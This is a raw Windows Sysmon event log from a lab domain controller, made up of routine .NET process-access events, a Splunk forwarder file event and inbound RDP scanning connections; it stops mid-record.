354300x800000000000000076299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.370{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50296-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000076298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.751{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60131-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.858{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-790D-00000000BB01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.842{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-790D-00000000BB01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-790D-00000000BB01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.795{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-780D-00000000BB01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.780{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-780D-00000000BB01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.780{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-780D-00000000BB01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.717{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-770D-00000000BB01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.701{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-770D-00000000BB01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.701{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-770D-00000000BB01}6588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.467{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-760D-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000076287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.451{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC38CEE8C33BA409F676A639975B659F,SHA256=FECBAC3984ECB4D0997C1B3B45D8811F418367369C480608092655323B14AB4A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.451{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-760D-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.451{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-760D-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.420{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-750D-00000000BB01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.405{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-750D-00000000BB01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.405{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-750D-00000000BB01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-740D-00000000BB01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.326{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-740D-00000000BB01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.326{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-740D-00000000BB01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.264{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-730D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.248{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-730D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.248{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-730D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.233{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-0E00-00000000BB01}1096C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 